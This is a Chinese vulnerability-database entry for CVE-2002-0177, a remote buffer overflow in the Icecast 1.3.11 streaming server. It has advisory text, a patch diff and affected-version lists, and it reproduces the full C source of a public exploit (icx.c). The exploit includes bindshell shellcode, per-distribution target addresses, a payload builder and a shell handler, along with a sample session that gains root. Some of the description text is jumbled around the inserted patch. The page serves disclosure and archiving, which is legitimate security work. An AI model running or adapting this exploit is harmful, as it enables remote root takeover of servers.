CVE-2002-0177
CVSS7.5
发布时间 :2002-04-22 00:00:00
修订时间 :2016-10-17 22:16:47
NMCOES    

[原文]Buffer overflows in icecast 1.3.11 and earlier allows remote attackers to execute arbitrary code via a long HTTP GET request from an MP3 client.


[CNNVD]Icecast AVLLib存在远程缓冲区溢出漏洞(CNNVD-200204-026)

        
        Icecast是一款免费开放源代码音频流服务程序,可使用在Unix、Linux和Microsoft Windows操作系统下。
        Icecast没有对客户端发送数据进行充分的边界检查,可导致远程用户产生缓冲溢出而以root的权限执行任意代码。
        问题存在于client_login函数中,client_login()接收mp3客户端提供的GET 临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        Neeko Oni <neeko@haackey.com>提供如下补丁程序:
        --- client.c Wed Aug 1 16:06:53 2001
        +++ src/client.c Wed Apr 3 12:36:23 2002
        @@ -103,6 +103,11 @@
        xa_debug(3, "Client login...\n");
        + if (strlen(expr) > 8000) {
        + write_log(LOG_DEFAULT, "WARNING: expr greater than 8000--possible BOF attack?");
        + return;
        +}
        +
        if (!con || !expr) {
        write_log(LOG_DEFAULT, "WARNING: client_login called with NULL pointer");
        return;
        厂商补丁:
        Icecast
        -------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.icecast.org/
HTTP/1.0字符串,攻击者可以构造超长的字符串提交给此函数产生缓冲区溢出,导致攻击者可以以root用户的权限在服务器上执行任意代码。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:icecast:icecast:1.3.7
cpe:/a:icecast:icecast:1.3.11
cpe:/a:icecast:icecast:1.3.10
cpe:/a:icecast:icecast:1.3.8_beta2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0177
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0177
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200204-026
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=101780890326179&w=2
(UNKNOWN)  BUGTRAQ  20020402 icecast 1.3.11 remote shell/root exploit - #temp
http://marc.info/?l=bugtraq&m=101786838300906&w=2
(UNKNOWN)  BUGTRAQ  20020403 Icecast temp patch (OR: Patches? We DO need stinkin' patches!!@$!)
http://marc.info/?l=bugtraq&m=101793704306035&w=2
(UNKNOWN)  BUGTRAQ  20020404 Full analysis of multiple remotely exploitable bugs in Icecast 1.3.11
http://www.kb.cert.org/vuls/id/596387
(UNKNOWN)  CERT-VN  VU#596387
http://www.securityfocus.com/bid/4415
(UNKNOWN)  BID  4415
http://www.xiph.org/archives/icecast/2616.html
(VENDOR_ADVISORY)  CONFIRM  http://www.xiph.org/archives/icecast/2616.html

- 漏洞信息

Icecast AVLLib存在远程缓冲区溢出漏洞
高危 边界条件错误
2002-04-22 00:00:00 2005-10-20 00:00:00
远程  
        
        Icecast是一款免费开放源代码音频流服务程序,可使用在Unix、Linux和Microsoft Windows操作系统下。
        Icecast没有对客户端发送数据进行充分的边界检查,可导致远程用户产生缓冲溢出而以root的权限执行任意代码。
        问题存在于client_login函数中,client_login()接收mp3客户端提供的GET 临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        Neeko Oni <neeko@haackey.com>提供如下补丁程序:
        --- client.c Wed Aug 1 16:06:53 2001
        +++ src/client.c Wed Apr 3 12:36:23 2002
        @@ -103,6 +103,11 @@
        xa_debug(3, "Client login...\n");
        + if (strlen(expr) > 8000) {
        + write_log(LOG_DEFAULT, "WARNING: expr greater than 8000--possible BOF attack?");
        + return;
        +}
        +
        if (!con || !expr) {
        write_log(LOG_DEFAULT, "WARNING: client_login called with NULL pointer");
        return;
        厂商补丁:
        Icecast
        -------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.icecast.org/
HTTP/1.0字符串,攻击者可以构造超长的字符串提交给此函数产生缓冲区溢出,导致攻击者可以以root用户的权限在服务器上执行任意代码。
        

- 公告与补丁

        

- 漏洞信息 (21363)

Icecast 1.x AVLLib Buffer Overflow Vulnerability (EDBID:21363)
unix remote
2002-02-16 Verified
0 dizznutt
N/A [点击下载]
source: http://www.securityfocus.com/bid/4415/info

Icecast is a freely available, open source streaming audio server. Icecast is available for the Unix, Linux, and Microsoft Windows platforms.

Icecast does not properly check bounds on data sent from clients. Because of this, it is possible for a remote user to send an arbitrarily long string of data to the server, which could result in a stack overflow, and the execution of user supplied code. The code would be executed with the privileges of the Icecast server. 

/*  all content is (c) #temp 2002 and may not be
 *  (re)published in any form or (re)distributed 
 *  without written permission of the author (diz) 
 *
 * 
 * 	icx.c -- icecast remote shell/root  
 *
 *
 * Found 15-02-2002...exploited 16-02-2002 ;P	
 *
 * Affected:
 *  all versions up to 1.3.11 (current) 
 * 
 * the client_login() function is passed the full GET %s HTTP/1.0
 * string provided by a mp3 client. Somewhere along the way an evil 
 * string function overflows buffer bounds with our humpage.. We can 
 * overflow just enough to reach and overwrite an instruction pointer. 
 * Humpage occurs somewhere in the handling of the request string
 * between mount searching and request building...Havent been able
 * to locate the exact spot as of yet (just discovered bug yesterday 
 * investigating another possible overflow in icecast extract_vars() 
 * funtion) Also some libavl routines look mighty guilty..especially 
 * avl_destroy. I cant really be bothered to check all entry points. 
 *
 * This is why:
 *
 * root@blackout:/home/diz/audits/icecast-1.3.11/src > grep strcpy all.c | wc -w
 *    284
 * root@blackout:/home/diz/audits/icecast-1.3.11/src > grep sprintf all.c | wc -w
 *    568
 * root@blackout:/home/diz/audits/icecast-1.3.11/src > grep strcat all.c | wc -w
 *     68
 * root@blackout:/home/diz/audits/icecast-1.3.11/src >                    
 *
 *
 * A quick and dirty patch is to check and make sure the length of expr does not
 * surpass 8000 bytes ala in client_login() in /src/client.c and recompile:
 * 
 * // dirty fix
 * if(strlen(expr) > 8000) 
 *	return;
 * // end of dirty fix
 *
 * What can we do:
 *
 * We can either overwrite a framepointer and make the process pop an 
 * instruction pointer out of memory we control. Or overflow eip directly. 
 * 
 * We go for the direct eip hump(tm)
 *
 * For framepointer humpage:
 *
 * Finding the address to overflow ebp with to make esp
 * point into the start of our buffer is easy..just gdb the
 * target platform icecast binary and set a breakpoint in
 * the client_login() function..output will be like this
 *
 * ...
 *  Breakpoint 1, 0x804af49 in client_login (con=0x808d0f0, expr=0xbf3fdaf4
 *  "GET ", 'x' <repeats 196 times>...) at client.c:97
 *  97      void client_login(connection_t *con, char *expr)
 * ...
 *
 * expr is a pointer to our original string..so we know that
 * is the start of our string in memory. Luck would have it we can just 
 * use that exact address and with pop incrementing it works out
 * to be correct and point to the start of our eip bytes :)
 * or into nops on a normal overflow. (which we will be doing)
 *
 * !!! Attention:
 *
 * When we just go for eip in one go we also need this address because
 * icecast will only give us one go :( so we can't offset and brute it
 * allthough we CAN pad with 7000+ nops..so finding a decent one go
 * compromise shouldnt be that much of a problem :)
 *
 * 			diz - #temp
 *
 * special word to pip and blink for helping me gather expr addresses
 * 
 * word to: eric, n0b0dy, muska, alcapone, sj, primalux, vonguard
 * 		khromy, jesse666 and r0ss
 * 
 * !!! A big "we hope leprosy strikes thee down!" to 2600.net !!!
 *
 * to compile standard overflow sploit: gcc icx.c -o icx 
 * to compile framepointer overflow sploit: gcc icx.c -o icx -DFPO
 *
 * note: for practical exploit usage just use standard mode
 * framepointer bits are left in cuz Im toying with them
 *
 * 	this version is meant for linux x86 targets 
 *
 *     PATCHES!?!?! WE DON'T NEED NO STINKIN PATCHES!!!
 */

/*

root@blackout:/usr/local/icecast/bin > ./icecast
Icecast Version 1.3.11 Initializing...
Icecast comes with NO WARRANTY, to the extent permitted by law.
You may redistribute copies of Icecast under the terms of the
GNU General Public License.
For more information about these matters, see the file named COPYING.
Starting thread engine...
[16/Feb/2002:15:39:33] Icecast Version 1.3.11 Starting..
[16/Feb/2002:15:39:33] Starting Admin Console Thread...
-> [16/Feb/2002:15:39:33] Starting main connection handler...
-> [16/Feb/2002:15:39:33] Listening on port 8000...
-> [16/Feb/2002:15:39:33] Listening on port 8001...
-> [16/Feb/2002:15:39:33] Using 'blackout' as servername...
-> [16/Feb/2002:15:39:33] Server limits: 900 clients, 900 clients per 
source, 10 sources, 5 admins
-> [16/Feb/2002:15:39:33] WWW Admin interface accessible at 
http://blackout:8000/admin
-> [16/Feb/2002:15:39:33] Starting Calender Thread...
-> [16/Feb/2002:15:39:33] Starting UDP handler thread...
-> [16/Feb/2002:15:39:33] Starting relay connector thread...
-> -> [16/Feb/2002:15:39:33] [Bandwidth: 0.000000MB/s] [Sources: 0] 
[Clients: 0] [Admins: 1] [Uptime: 0 seconds]
-> 

// this was a target compiled from source on my machine

diz@blackout:~/code/dizcode > ./icx -h blackout -p 8000 -b 0xbf3fdaf4 -a 1 
[ icx -- icecast humpage -- diz (#temp) ]
! resolving server: blackout
! compiled as standard overflow version
! using 0xbf3fdb58 as eip address
! sending string
! giving remote time to setup shop...zzz
! attempting to connect to bindshell
! connected to remote shell :)
$ id
uid=0(root) gid=0(root) groups=0(root),1(bin),14(uucp),15(shadow),16(dialout),17(audio),33(video),65534(nogroup)
$ exit
! done
diz@blackout:~/code/dizcode > 

*/

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <errno.h>

#define ALLIGN	0
#define NOP	0x90

#define STRING 	"GET %s%s HTTP/1.0\n\n" 

char allignbuf[4]; 
char outbuf[8206]; 
char nopbuf[512]; 

#ifdef FPO
char humpbuf[8182]; // 8181 bytes to hit ebp
#else
char humpbuf[8186]; // 8185 bytes to overwrite ebp and eip ( minus 4 for BSD hosts)
#endif

char code[] = 
	// taeho oh bindshell code -- binds to port 30464
	"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
  	"\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
  	"\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89"
  	"\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31"
  	"\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80"
  	"\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"
  	"\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd"
  	"\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80"
  	"\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f"
  	"\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89"
  	"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
  	"\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";


struct info {
	char *host;
	char *ip;
	int port;
	int allign;
	u_long address;
} icx;

void type(int type);
void handleshell(int sock);

int main(int argc, char **argv)
{
	struct sockaddr_in slut;
	struct hostent *ip;
	int s, b, len = 0, i;
	u_int w[4], eip[4];
	char *temp, c;	
	
	if(argc == 1) {
		fprintf(stderr, "Usage: %s -h <host> -p <icecast port> [ -t <type> ] OR [ -a <allign>  -b <address of *expr> ]\n", argv[0]);
		fprintf(stderr, "\nTypes are (linux version):\n\n");
		fprintf(stderr, "------------------------------------------------\n");
		fprintf(stderr, "(1) SuSE 7.2 icecast 1.3.10 (rpm)\n");
		fprintf(stderr, "(2) debian 2.2.r2 sid icecast 1.3.11 (deb)\n");
		fprintf(stderr, "(3) slackware 8.0.0 (�tta) icecast 1.3.11 (tgz)\n");
		fprintf(stderr, "------------------------------------------------\n\n");
		fprintf(stderr, "[  read comments on how to aquire new targets  ]\n\n");
		exit(1);
	}
	
	fprintf(stderr, "[ icx -- icecast humpage -- diz (#temp) ]\n");

	// default allign
	icx.allign = ALLIGN;
	
	
	while((c = getopt(argc, argv, "h:p:a:b:t:")) != EOF) {
		switch(c) {
			case 'h':
				icx.host = optarg;
				break;
			case 'p':
				icx.port = atoi(optarg);
				break;
			case 'b':
				sscanf(optarg, "%p", &temp);
				icx.address = (long)temp;
				break;
			case 'a':
				icx.allign = atoi(optarg);
				break;
			case 't':
				type(atoi(optarg));
				break;
			default:
				fprintf(stderr, "! huh ?\n");
				exit(1);
		}
	}
	
	fprintf(stderr, "! resolving server: %s\n", icx.host);

        if((ip = gethostbyname(icx.host)) == NULL) {
                perror("! gethostbyname");
                exit(1);
        }
	
	icx.ip = (char *)inet_ntoa(*((struct in_addr *)ip->h_addr));	

        s = socket(AF_INET, SOCK_STREAM, 0);
        slut.sin_family = AF_INET;
        slut.sin_port = htons(icx.port);
        slut.sin_addr.s_addr = inet_addr(icx.ip);
        memset(&(slut.sin_zero), '\0', 8);


	// setting overflow address

	#ifdef FPO

	icx.address += icx.allign;	
	
	#else
	
	icx.address += 100; // pointing into nops in *expr
	
	#endif 

	#ifdef FPO
	
	fprintf(stderr, "! compiled as frame pointer overflow version\n");
	fprintf(stderr, "! using 0x%lx as ebp address\n", icx.address);

	#else
	
	fprintf(stderr, "! compiled as standard overflow version\n");	
	fprintf(stderr, "! using 0x%lx as eip address\n", icx.address);
	
	#endif 
	
	// sort out overflow bytes
	w[0] = (icx.address & 0x000000ff);
        w[1] = (icx.address & 0x0000ff00) >> 8;
        w[2] = (icx.address & 0x00ff0000) >> 16;
        w[3] = (icx.address & 0xff000000) >> 24;
	
	
	// setting the eip address make sure it points into nops
	// allthough there are no nops to point into yet..behe
	
	#ifdef FPO
	
	icx.address += (16 + icx.allign + 100);
	
	fprintf(stderr, "! using 0x%lx as eip address\n", icx.address);
	
	// sort out eip pop bytes
	eip[0] = (icx.address & 0x000000ff);
        eip[1] = (icx.address & 0x0000ff00) >> 8;
        eip[2] = (icx.address & 0x00ff0000) >> 16;
        eip[3] = (icx.address & 0xff000000) >> 24;
	
	#endif

	// fill nop buffer
        memset(&nopbuf, '\0', sizeof(nopbuf));
        for(i = 0; i < sizeof(nopbuf); i++)
                nopbuf[i] = NOP;

	// allign
	memset(&allignbuf, '\0', sizeof(allignbuf));
	for(i = 0; i < icx.allign && i < sizeof(allignbuf); i++) 
		allignbuf[i] = 'x';
	
	memset(&humpbuf, '\0', sizeof(humpbuf));	

	#ifdef FPO
	
	// place eip read bytes 4 times
	for(i = 0, b = 0; i < 16; i++, b++) {
		if(b == 4) b = 0;
		humpbuf[i] = (char)eip[b];
	}
	
	// sprintf(&humpbuf[16], "%s%s", nopbuf, code);
	
	#else
	
	sprintf(&humpbuf[0], "%s%s", nopbuf, code);
	
	#endif
	
	// filling rest of string with garbage bytes
	// be sure to take the length of nops + shellcode
	// into account when the string contains them
	
	#ifdef FPO
	
	//! fp poop
	for(i = 16; i < (sizeof(humpbuf) - 1); i++)
		humpbuf[i] = 'x';
	
	#else
	
	// take length off shellcode and nops into account when we have some
	for(i = (strlen(nopbuf) + strlen(code)); i < (sizeof(humpbuf) - 1); i++)
                humpbuf[i] = 'x';
	
	#endif

	
	// making last 8 bytes overflow bytes (be it ebp..be it eip)
	humpbuf[sizeof(humpbuf) - 9] = (char)w[0];
        humpbuf[sizeof(humpbuf) - 8] = (char)w[1];
        humpbuf[sizeof(humpbuf) - 7] = (char)w[2];
        humpbuf[sizeof(humpbuf) - 6] = (char)w[3];

	humpbuf[sizeof(humpbuf) - 5] = (char)w[0];
	humpbuf[sizeof(humpbuf) - 4] = (char)w[1];
	humpbuf[sizeof(humpbuf) - 3] = (char)w[2];	
	humpbuf[sizeof(humpbuf) - 2] = (char)w[3];
	
	
	// connecting and going for the hump
	if(connect(s, (struct sockaddr *)&slut, sizeof(struct sockaddr)) == -1) {
		perror("! connect");
		exit(1);
	}
	else {
		memset(&outbuf, '\0', sizeof(outbuf));	
		snprintf(outbuf, sizeof(outbuf), STRING, allignbuf, humpbuf);
		
		#ifdef DEBUG
		for(i = 0; i < sizeof(outbuf); i++) 
			fprintf(stderr, "! byte %d [ 0x%x ]\n", i, outbuf[i]);
		#endif
		
		do {
			fprintf(stderr, "! sending string\n");
			len += send(s, outbuf, strlen(outbuf), 0);
		}
		while(len < strlen(outbuf));
		
		close(s);
	
		fprintf(stderr, "! giving remote time to setup shop...zzz\n");
		sleep(5);	
	
		fprintf(stderr, "! attempting to connect to bindshell\n");
		s = socket(AF_INET, SOCK_STREAM, 0);
		slut.sin_port = htons(30464);
		if(connect(s, (struct sockaddr *)&slut, sizeof(struct sockaddr)) == -1) {
                	perror("! connect");
			fprintf(stderr, "! check 30464 with nc in case target was slow\n");
                	exit(1);
		}
		else {
			fprintf(stderr, "! connected to remote shell :)\n");
			handleshell(s);
		}
        }
		
	fprintf(stderr, "! done\n");
	exit(0);
}
	
void type(int type)
{
	// suse 7.2 1.3.10 (rpm)
	if(type == 1) {
		icx.address = 0xbf3fdaf4;
		icx.allign = 0;
		return;
	}
	
	// debian 2.2.r2 sid 1.3.11 (deb)
	if(type == 2) {
		icx.address = 0xbeffdaf4;
		icx.allign = 0;
		return;
	}
	
	// slackware 8.0.0 (�tta) 1.3.11 (tgz)
	if(type == 3) {
		icx.address = 0xbeffdaf4;
                icx.allign = 0;
                return;
	}

	fprintf(stderr, "! type not found..exiting\n");
	exit(1);
}

		
void handleshell(int sock)
{
 	char inbuf[4096], outbuf[1024];

	fd_set fdset; 
	fprintf(stderr, "$ ");
     
	while(1) {        
	
		FD_ZERO(&fdset);
        	FD_SET(fileno(stdin), &fdset);
        	FD_SET(sock, &fdset);

		select(sock + 1, &fdset, NULL, NULL, NULL);

		if(FD_ISSET(fileno(stdin), &fdset)) {
			memset(outbuf, '\0', sizeof(outbuf));
			fgets(outbuf, sizeof(outbuf), stdin);
			if(strstr(outbuf, "exit") != NULL) {
				close(sock);
				return;
			}
			if(write(sock, outbuf, strlen(outbuf)) < 0) {
				fprintf(stderr, "! write error\n");
				return;
			}
		}

		if(FD_ISSET(sock, &fdset)) {
			memset(inbuf, '\0', sizeof(inbuf));
			if(read(sock, inbuf, sizeof(inbuf)) < 0) {
				fprintf(stderr, "! read error\n");
				return;
			}
			fputs(inbuf, stderr);
			fprintf(stderr, "$ ");
		}
	}
}
		

- 漏洞信息

10445
Icecast MP3 Client HTTP GET Request Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2002-04-02 Unknow
2002-04-02 Unknow

- 解决方案

Upgrade to version 1.3.12-1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Icecast AVLLib Buffer Overflow Vulnerability
Boundary Condition Error 4415
Yes No
2002-04-03 12:00:00 2009-07-11 11:56:00
Vulnerability discovery credited to <dizznutt@my.security.nl>.

- 受影响的程序版本

Icecast Icecast WIN32 1.3.7
Icecast Icecast 1.3.11
- BSDI BSD/OS 4.2
- BSDI BSD/OS 4.1
- BSDI BSD/OS 4.0.1
- BSDI BSD/OS 4.0
- BSDI BSD/OS 3.1
- BSDI BSD/OS 3.0
- Caldera OpenLinux Server 3.1.1
- Caldera OpenLinux Server 3.1
- Caldera OpenLinux Workstation 3.1.1
- Caldera OpenLinux Workstation 3.1
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 IA-32
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
- FreeBSD FreeBSD 4.5
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.3
- FreeBSD FreeBSD 4.2
- Mandriva Linux Mandrake 8.1 ia64
- Mandriva Linux Mandrake 8.1
- Mandriva Linux Mandrake 8.0 ppc
- Mandriva Linux Mandrake 8.0
- Mandriva Linux Mandrake 7.2
- Mandriva Linux Mandrake 7.1
- OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 3.0
- RedHat Linux 7.2 ia64
- RedHat Linux 7.2 i386
- RedHat Linux 7.2 alpha
- RedHat Linux 7.1 ia64
- RedHat Linux 7.1 i386
- RedHat Linux 7.1 alpha
- RedHat Linux 7.0 sparc
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
- Sun Solaris 7.0_x86
- Sun Solaris 7.0
- Sun Solaris 2.6_x86
- Sun Solaris 2.6
Icecast Icecast 1.3.10 -1
Icecast Icecast 1.3.9 -2
Icecast Icecast 1.3.9 -1
Icecast Icecast 1.3.9
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Conectiva Linux 4.2
+ Conectiva Linux 4.1
Icecast Icecast 1.3.8 beta2
Icecast Icecast 1.3.8
Icecast Icecast 1.3.7 -1
Icecast Icecast 1.3.7
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
Icecast Icecast 1.3.5 -1
Icecast Icecast 1.3.5
Icecast Icecast 1.3 .10
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
Icecast Icecast 1.3 .0
Icecast Icecast 1.1.4
Icecast Icecast 1.1.3
Icecast Icecast 1.1.2
Icecast Icecast 1.1.1
Icecast Icecast 1.1 .0
Icecast Icecast 1.0 .0
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
- Debian Linux 2.2
Icecast Icecast 1.3.12
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1

- 不受影响的程序版本

Icecast Icecast 1.3.12
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1

- 漏洞讨论

Icecast is a freely available, open source streaming audio server. Icecast is available for the Unix, Linux, and Microsoft Windows platforms.

Icecast does not properly check bounds on data sent from clients. Because of this, it is possible for a remote user to send an arbitrarily long string of data to the server, which could result in a stack overflow, and the execution of user supplied code. The code would be executed with the privileges of the Icecast server.

- 漏洞利用

Exploit contributed by &lt;dizznutt@my.security.nl&gt;.

- 解决方案

This patch has been provided by Neeko Oni <neeko@haackey.com>:

--- client.c Wed Aug 1 16:06:53 2001
+++ src/client.c Wed Apr 3 12:36:23 2002
@@ -103,6 +103,11 @@

xa_debug(3, "Client login...\n");

+ if (strlen(expr) > 8000) {
+ write_log(LOG_DEFAULT, "WARNING: expr greater than 8000--possible BOF attack?");
+ return;
+}
+
if (!con || !expr) {
write_log(LOG_DEFAULT, "WARNING: client_login called with NULL pointer");
return;

Updated versions of Icecast have been made available:


Icecast Icecast 1.0 .0

Icecast Icecast 1.1 .0

Icecast Icecast 1.1.1

Icecast Icecast 1.1.2

Icecast Icecast 1.1.3

Icecast Icecast 1.1.4

Icecast Icecast 1.3 .0

Icecast Icecast 1.3 .10

Icecast Icecast 1.3.10 -1

Icecast Icecast 1.3.11

Icecast Icecast 1.3.5 -1

Icecast Icecast 1.3.5

Icecast Icecast 1.3.7 -1

Icecast Icecast 1.3.7

Icecast Icecast WIN32 1.3.7

Icecast Icecast 1.3.8 beta2

Icecast Icecast 1.3.8

Icecast Icecast 1.3.9 -1

Icecast Icecast 1.3.9

Icecast Icecast 1.3.9 -2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站